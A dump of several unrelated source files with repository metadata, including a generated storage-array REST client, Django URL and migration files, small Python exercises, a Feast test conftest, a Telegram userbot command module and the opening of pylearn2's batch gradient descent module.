for asynchronous request. (optional)
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param int start_time: Time to start sample in milliseconds since epoch.
:param str type: to sample space of either file systems, object store, or all
:return: ArrayPerformanceReplicationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['end_time', 'resolution', 'start_time', 'type']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_performance_replication" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'type' in params:
query_params.append(('type', params['type']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/performance/replication', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceReplicationResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_s3_specific_performance(self, **kwargs):
"""
List instant or historical object store specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_s3_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayS3PerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_s3_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_s3_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_s3_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical object store specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_s3_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayS3PerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_s3_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/s3-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayS3PerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_space(self, **kwargs):
"""
List instant or historical array space
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_space(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str type: to sample space of either file systems, object store, or all
:return: ArraySpaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_space_with_http_info(**kwargs)
else:
(data) = self.list_arrays_space_with_http_info(**kwargs)
return data
def list_arrays_space_with_http_info(self, **kwargs):
"""
List instant or historical array space
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_space_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str type: to sample space of either file systems, object store, or all
:return: ArraySpaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution', 'type']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_space" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'type' in params:
query_params.append(('type', params['type']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/space', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArraySpaceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_clients_performance(self, **kwargs):
"""
List client performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_clients_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: The way to order the results.
:param int limit: limit, should be >= 0
:return: ClientPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_clients_performance_with_http_info(**kwargs)
else:
(data) = self.list_clients_performance_with_http_info(**kwargs)
return data
def list_clients_performance_with_http_info(self, **kwargs):
"""
List client performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_clients_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: The way to order the results.
:param int limit: limit, should be >= 0
:return: ClientPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'filter', 'sort', 'limit']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_clients_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/clients/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClientPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_arrays(self, array_settings, **kwargs):
"""
Update arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_arrays(array_settings, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param PureArray array_settings: (required)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_arrays_with_http_info(array_settings, **kwargs)
else:
(data) = self.update_arrays_with_http_info(array_settings, **kwargs)
return data
def update_arrays_with_http_info(self, array_settings, **kwargs):
"""
Update arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_arrays_with_http_info(array_settings, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param PureArray array_settings: (required)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['array_settings']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_arrays" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'array_settings' is set
if ('array_settings' not in params) or (params['array_settings'] is None):
raise ValueError("Missing the required parameter `array_settings` when calling `update_arrays`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'array_settings' in params:
body_params = params['array_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"tlewis@purestorage.com"
] |
tlewis@purestorage.com
|
d41c0a0dcfbff280e11e9fa43fbd1a64b889ce22
|
6444935a3e304e0d8f0fc4cf7fbb7153621cfc53
|
/technosphere_python_backend/homeworks/06_07/project/project/urls.py
|
6f1f921969039500acc29fa06730692f4e48846f
|
[] |
no_license
|
SVasi1yev/other
|
d1032871dc36a22cc2b556d4cbf6c0dc0c968e87
|
1c31090e7b3e0ff04e00b4f5b0b7ac917fe83ed2
|
refs/heads/master
| 2023-08-04T16:28:05.163894
| 2023-07-17T14:32:09
| 2023-07-17T14:32:09
| 138,393,326
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,141
|
py
|
"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
import sys
sys.path.append('..')
from forum import views
urlpatterns = [
path('admin/', admin.site.urls),
path('forum/', include('forum.urls')),
path('login/', views.login, name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('social_auth/', include('social_django.urls', namespace='social')),
path('', views.home, name='home')
]
|
[
"vsemenm@gmail.com"
] |
vsemenm@gmail.com
|
d9b1642074ff790c14fedd3afa80bc618136166c
|
2191d0e0d9fbec3dcef93386ba6c691d222bfed4
|
/new_user/migrations/0015_auto_20170428_1826.py
|
5aed1ff9f421cb90cdfeb799f1cda59759a131cd
|
[] |
no_license
|
AnkitaVikramShetty/airbnbNewUserPredictions
|
19e7a74bd39cc663c23e0a7c407d9a151a37a954
|
86338384d565fcd017f18944559165ee806b751f
|
refs/heads/master
| 2021-01-19T04:40:59.235835
| 2017-05-02T16:14:55
| 2017-05-02T16:14:55
| 87,385,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 579
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('new_user', '0014_auto_20170428_1119'),
]
operations = [
migrations.AddField(
model_name='age_gender_bkts',
name='population_in_thousands',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='age_gender_bkts',
name='year',
field=models.FloatField(null=True),
),
]
|
[
"smaaz015@gmail.com"
] |
smaaz015@gmail.com
|
5893049dfab4f9e7702c5a3117f4468d5c72a98f
|
27bd7769798502bccbbc4b1bbc34e22d17f17d98
|
/regressao_linear.py
|
6dd8db7e2851e9a8717ad91bfc2f4b32d1eb00d7
|
[] |
no_license
|
jcclark/regressao_linear
|
03f3bfd759de3e629788d7ba6891f081ae41a667
|
bcf27dd810eb3916809b3683098ae2c3bd4dc619
|
refs/heads/master
| 2020-08-01T09:29:57.254610
| 2019-10-05T22:35:14
| 2019-10-05T22:35:14
| 210,948,723
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,757
|
py
|
import csv
import math
from random import randint
import matplotlib.pyplot as plt
def modelo( data, tipo, i):
dados = dv_dados(data, tipo)
b_treino, b_teste = dv_bases(dados, i)
b_0, b_1 = regressao_linear(b_treino, tipo)
x = [d[0] for d in dados]
y = [(b_0 + (d[0] * b_1)) for d in dados]
desvio = desvio_padrao(b_teste, b_0, b_1)
print("Desvio padrão: " + str( round(desvio, 2) ))
plt.title('Média Provas x ' + tipo )
plt.xlabel(tipo.title())
plt.ylabel('Média provas')
plt.scatter(x, y)
plt.plot(x, y)
plt.show()
def desvio_padrao( b_teste, b_0, b_1):
desvio = 0
for d in b_teste:
y = d[1]
fx = (b_0 + (d[0] * b_1))
desvio += (y - fx) ** 2
return desvio
def regressao_linear( b_treino, type):
N = len(b_treino)
x = somatorio(b_treino, 'x')
y = somatorio(b_treino, 'y')
xy = somatorio(b_treino, 'xy')
x1 = somatorio(b_treino, 'x2')
b_1 = ((x * y) - (N * xy)) / ((x ** 2) - (N * x1))
b_0 = (y - (b_1 * x))/ N
return b_0, b_1
def somatorio( l_n, tipo):
numeros = []
for t in l_n:
if tipo == 'x':
a = t[0]
elif tipo == 'y':
a = t[1]
elif tipo == 'xy':
a = t[0] * t[1]
elif tipo == 'x2':
a = t[0] ** 2
else:
a = 1
print('Erro')
numeros.append(a)
return sum(numeros)
def dv_dados( data, tipo):
res = []
for item in data:
if tipo == "Idade":
x = item.get("Idade")
elif tipo == "Tempo de Estudo":
x = item.get("Tempo de Estudo")
elif tipo == "Faltas":
x = item.get("Faltas")
y = item.get("MediaProvas")
res.append((int(x), int(y)))
return res
def dv_bases(dados, i):
p_treino = []
while (len(p_treino) < round(i * 0.7)):
posicao = randint(0, i - 1)
if posicao not in p_treino:
p_treino.append(posicao)
d_treino = [dados[p] for p in p_treino]
d_treino = [dados[p] for p in range(len(dados)) if p not in p_treino]
return d_treino, d_treino
def excutar():
data = []
with open("AnaliseEstudo.csv") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=";")
for row in csv_reader:
if row[0] != "Idade":
media = (int(row[3]) + int(row[4]) + int(row[5])) / 3
aux = {
"Idade": row[0],
"Tempo de Estudo": row[1],
"Faltas":row[2],
"MediaProvas": media
}
data.append(aux)
for tipo in ["Idade", "Tempo de Estudo", "Faltas"]:
modelo(data, tipo, len(data))
excutar()
|
[
"juniorclark@gmail.com"
] |
juniorclark@gmail.com
|
2ae5a8847cf48e47a874c90b02e69013112279ba
|
f9faa75c7a0608f5a03fde26fb494de9bfdaa895
|
/WEEK 1/part01-e05_two_dice/src/two_dice.py
|
a650e13f6172340c085080170522dc497bc76781
|
[] |
no_license
|
LeguizamonLuciano/DataAnalysisHelsinkiUni
|
16a8bead739b35a75f9d72c5691eedee70efc4eb
|
84af79815a5bcd497f731c4c24a22bb569db0c7f
|
refs/heads/main
| 2023-01-15T20:18:01.487593
| 2020-11-09T23:11:19
| 2020-11-09T23:11:19
| 307,580,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
#!/usr/bin/env python3
def main():
for i in range(1,7):
for j in range(1,7):
if i+j == 5:
print((i,j))
if __name__ == "__main__":
main()
|
[
"lucianoleguizamon@outlook.com"
] |
lucianoleguizamon@outlook.com
|
762b157f8689129dbb59a301f005e5c667ff34f1
|
9fe97e356baf38e92a46553a5eb21d6f0942ec14
|
/cluster/sdk/tests/e2e/conftest.py
|
534468ccc96285a9421e6e2bca799c442ed25e02
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
ezwiefel/feast-azure
|
1adbd9c3a12577c42164e7536d4afed6096a8e3c
|
ae94e7232439559205d5e1e84217d8274e3d2f3b
|
refs/heads/main
| 2023-08-27T00:43:26.233519
| 2021-11-04T10:53:01
| 2021-11-04T10:53:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,696
|
py
|
import os
import pytest
def pytest_addoption(parser):
parser.addoption("--core-url", action="store", default="localhost:6565")
parser.addoption("--serving-url", action="store", default="localhost:6566")
parser.addoption("--job-service-url", action="store", default="localhost:6568")
parser.addoption("--kafka-brokers", action="store", default="localhost:9092")
parser.addoption(
"--env", action="store", help="local|aws|gcloud|k8s|synapse", default="local"
)
parser.addoption("--with-job-service", action="store_true")
parser.addoption("--staging-path", action="store")
parser.addoption("--dataproc-cluster-name", action="store")
parser.addoption("--dataproc-region", action="store")
parser.addoption("--emr-cluster-id", action="store")
parser.addoption("--emr-region", action="store")
parser.addoption("--dataproc-project", action="store")
parser.addoption("--dataproc-executor-instances", action="store", default="2")
parser.addoption("--dataproc-executor-cores", action="store", default="2")
parser.addoption("--dataproc-executor-memory", action="store", default="2g")
parser.addoption("--k8s-namespace", action="store", default="sparkop-e2e")
parser.addoption("--azure-synapse-dev-url", action="store", default="")
parser.addoption("--azure-synapse-pool-name", action="store", default="")
parser.addoption("--azure-synapse-datalake-dir", action="store", default="")
parser.addoption("--azure-blob-account-name", action="store", default="")
parser.addoption("--azure-blob-account-access-key", action="store", default="")
parser.addoption("--ingestion-jar", action="store")
parser.addoption("--redis-url", action="store", default="localhost:6379")
parser.addoption("--redis-cluster", action="store_true")
parser.addoption("--feast-version", action="store")
parser.addoption("--bq-project", action="store")
parser.addoption("--feast-project", action="store", default="default")
parser.addoption("--statsd-url", action="store", default="localhost:8125")
parser.addoption("--prometheus-url", action="store", default="localhost:9102")
parser.addoption("--enable-auth", action="store_true")
parser.addoption(
"--scheduled-streaming-job",
action="store_true",
help="When set tests won't manually start streaming jobs,"
" instead jobservice's loop is responsible for that",
)
def pytest_runtest_setup(item):
env_names = [mark.args[0] for mark in item.iter_markers(name="env")]
if env_names:
if item.config.getoption("env") not in env_names:
pytest.skip(f"test requires env in {env_names}")
from .fixtures.base import project_root, project_version # noqa
from .fixtures.client import ( # noqa
feast_client,
feast_spark_client,
global_staging_path,
ingestion_job_jar,
local_staging_path,
tfrecord_feast_client,
)
if not os.environ.get("DISABLE_SERVICE_FIXTURES"):
from .fixtures.services import ( # noqa
kafka_port,
kafka_server,
redis_server,
statsd_server,
zookeeper_server,
)
else:
from .fixtures.external_services import ( # type: ignore # noqa
kafka_server,
redis_server,
statsd_server,
)
if not os.environ.get("DISABLE_FEAST_SERVICE_FIXTURES"):
from .fixtures.feast_services import * # type: ignore # noqa
from .fixtures.services import postgres_server # noqa
else:
from .fixtures.external_services import ( # type: ignore # noqa
feast_core,
feast_serving,
feast_jobservice,
enable_auth,
)
from .fixtures.data import * # noqa
|
[
"47040993+rramani@users.noreply.github.com"
] |
47040993+rramani@users.noreply.github.com
|
fd6eff07502fb4045b9c9bea91c6e2e5360f0a6c
|
dfac09701ae836ca8ff682ac741535eb84fec3af
|
/Dasha/modules/info.py
|
e291873d2b028cd6961d07b17aaaa10885835902
|
[] |
no_license
|
Srinath2006/Dasha
|
a166c2274e15e0b7a73a7216ae0a533843647f1d
|
54a2025c2cea0f89c322249578c271d132b90fd0
|
refs/heads/main
| 2023-08-23T02:23:26.245367
| 2021-11-02T14:28:39
| 2021-11-02T14:28:39
| 423,876,040
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,235
|
py
|
from Dasha import ubot
from Dasha.events import dasha
from . import get_user
from telethon.tl.functions.users import GetFullUserRequest
@dasha(pattern="^/info ?(.*)")
async def new(event):
if not event.reply_to_msg_id and not event.pattern_match.group(1):
user = await ubot.get_entity(event.sender_id)
else:
try:
user, extra = await get_user(event)
except TypeError as e:
print(e)
pass
user_id = user.id
first_name = user.first_name
last_name = user.last_name
username = user.username
text = "╒═══「<b>User info</b>:\n"
if first_name:
text += f"<b>First Name:</b> {first_name}\n"
if last_name:
text += f"<b>Last Name:</b> {last_name}\n"
ups = None
if username:
text += f"<b>Username:</b> @{username}\n"
ups = await event.client(GetFullUserRequest(user.username))
text += f"<b>ID:</b> <code>{user_id}</code>\n"
text += f'<b>User link:</b> <a href="tg://user?id={user_id}">{first_name}</a>'
if ups:
text += f"\n\n<b>Bio:</b> <code>{ups.about}</code>"
text += f"\n\n<b>Gbanned: No</b>"
text += f"\n\n╘══「 <b>Groups count:</b> {ups.common_chats_count} 」"
await event.edit(text, parse_mode='html')
@dasha(pattern="^/id ?(.*)")
async def _t(event):
if not event.reply_to_msg_id and not event.pattern_match.group(1):
user = await ubot.get_entity(event.sender_id)
else:
try:
user, extra = await get_user(event)
except TypeError as e:
print(e)
pass
user_id = user.id
chat_id = event.chat_id
msg_id = event.id
event_id = event.id
c_id = str(chat_id).replace('-100', '')
if event.reply_to_msg_id:
event_id = event.reply_to_msg_id
text = f"**[Chat ID]**(http://t.me/{event.chat.username}) : `{chat_id}`\n"
text += f"**[Message ID]**(http://t.me/c/{c_id}/{event_id}) : `{event_id}`\n"
text += f"**[User ID]**(tg://user?id={user_id}) : `{user_id}`"
if event.reply_to_msg_id:
msg = await event.get_reply_message()
if msg.sticker:
type = "Sticker"
elif msg.audio:
type = "Audio"
elif msg.gif:
type = "Gif"
elif msg.video:
type = "Video"
elif msg.media:
type = "Media"
if msg.media:
file_id = msg.file.id
text += f"\n\n**Media Type:** `{type}`\n"
text += f"**Fid:** `{file_id}`"
await event.edit(text)
|
[
"percy@railway.app"
] |
percy@railway.app
|
ee8d4a24f7c6068b54efb883495622825593dcad
|
065694179b7a132d989c373573a0e89686cc2c8c
|
/untitled/venv/include/task1.py
|
9fcae00b5f7e63cef0d7248881b10293e65e6e5b
|
[] |
no_license
|
vksychev/PythonPlayground
|
ff267b1173f43cae2d11634b70e75c0aa3f715aa
|
99c4c1471b4e3e5a528486a58bd92cfd42b33c0e
|
refs/heads/master
| 2020-03-21T06:11:23.144147
| 2018-12-27T14:56:07
| 2018-12-27T14:56:07
| 138,204,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 719
|
py
|
import math
def genA(n):
a = []
for i in range(n):
new_element = i
a.append(math.sin(new_element))
return a
def solution(A):
direction = 0
cur_direction = 0
count = 0
for i in range(len(A) - 1):
if A[i] < A[i + 1]:
cur_direction = 1
if direction != cur_direction:
direction = cur_direction
count += 1
elif A[i] > A[i + 1]:
cur_direction = -1
if direction != cur_direction:
direction = cur_direction
count += 1
return count + 1
def main():
A = [1, 2, 1, 2, 1, 2, 1, 2]
print(solution(A))
if (__name__ == "__main__"):
main()
|
[
"vksychev@yandex.ru"
] |
vksychev@yandex.ru
|
bec5d5fbb09b6260d514209bc438f344d215832b
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-sblp/sblp_ut=3.5_rd=1_rw=0.04_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=30/sched.py
|
a85202e958d39e172c17afa700742b708255c6d6
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 495
|
py
|
-S 0 -X RUN -Q 0 -L 2 84 250
-S 1 -X RUN -Q 0 -L 2 80 250
-S 0 -X RUN -Q 0 -L 2 74 250
-S 0 -X RUN -Q 0 -L 2 59 250
-S 2 -X RUN -Q 1 -L 1 57 200
-S 2 -X RUN -Q 1 -L 1 48 175
-S 2 -X RUN -Q 1 -L 1 40 125
-S 2 -X RUN -Q 1 -L 1 33 300
-S 3 -X RUN -Q 2 -L 1 29 100
-S 3 -X RUN -Q 2 -L 1 27 125
-S 3 -X RUN -Q 2 -L 1 21 100
-S 3 -X RUN -Q 2 -L 1 19 150
-S 4 -X RUN -Q 3 -L 1 19 100
-S 4 -X RUN -Q 3 -L 1 15 100
-S 4 -X RUN -Q 3 -L 1 14 100
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
9dae9e1cb02e03ac83133c64c0010ed526601e15
|
bd9c74247381121f71f3dde6b55c67856f58e124
|
/编程题/第4章-6 输出前 n 个Fibonacci数 (15分).py
|
d9428ceda6a9128e079ff4764f63ec641e09169e
|
[] |
no_license
|
Redomeliu/Python
|
302cd5abd89f7040911c8afb1db6faee6d43de64
|
9f5568ec59d30ce0f7d572d072b86088e933abc8
|
refs/heads/master
| 2023-01-05T19:51:00.795864
| 2020-10-29T02:42:36
| 2020-10-29T02:42:36
| 308,293,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 332
|
py
|
def Fibonacci(i):
lis = [1,1]
n = 1
while(i>n):
lis.append(lis[n]+lis[n-1])
n +=1
return lis[i]
x = int(input())
count = 0
for i in range(x):
count +=1
print(f'{Fibonacci(i):>11d}',end="")
if count == 5 or i==x-1:
print('\n')
count=0
if x < 1:
print('Invalid.')
|
[
"1258995373@qq.com"
] |
1258995373@qq.com
|
da11437adf2aba52e01ffabe242c48711dbfe401
|
d0a54183ad20c3e1bfb3d70d118b3a2ccf9256be
|
/pylearn2/pylearn2/training_algorithms/bgd.py
|
86cdd585642ea1c5ac01de3c8ab7785692360024
|
[
"BSD-3-Clause"
] |
permissive
|
julius506/pylearn2
|
93973fafb80ccd724c9ec16d6f0dcab0544acbcb
|
9134a6438e954cf5d8a1684ef8f5e2767549d6bc
|
refs/heads/master
| 2020-05-18T08:52:43.499030
| 2014-12-03T05:26:25
| 2014-12-03T05:26:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,764
|
py
|
"""
Module for performing batch gradient methods.
Technically, SGD and BGD both work with any batch size, but SGD has no line
search functionality and is thus best suited to small batches, while BGD
supports line searches and thuse works best with large batches.
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
import logging
import warnings
import numpy as np
from theano import config
from pylearn2.compat import OrderedDict
from pylearn2.monitor import Monitor
from pylearn2.optimization.batch_gradient_descent import BatchGradientDescent
from pylearn2.utils.iteration import is_stochastic
from pylearn2.training_algorithms.training_algorithm import TrainingAlgorithm
from pylearn2.utils import safe_zip
from pylearn2.train_extensions import TrainExtension
from pylearn2.termination_criteria import TerminationCriterion
from pylearn2.utils import sharedX
from pylearn2.space import CompositeSpace, NullSpace
from pylearn2.utils.data_specs import DataSpecsMapping
from pylearn2.utils.rng import make_np_rng
logger = logging.getLogger(__name__)
class BGD(TrainingAlgorithm):
"""
Batch Gradient Descent training algorithm class
Parameters
----------
cost : pylearn2.costs.Cost, optional
A pylearn2 Cost, or None, in which case model.get_default_cost()
will be used
batch_size : int, optional
Like the SGD TrainingAlgorithm, this TrainingAlgorithm still
iterates over minibatches of data. The difference is that this
class uses partial line searches to choose the step size along
each gradient direction, and can do repeated updates on the same
batch. The assumption is that you use big enough minibatches with
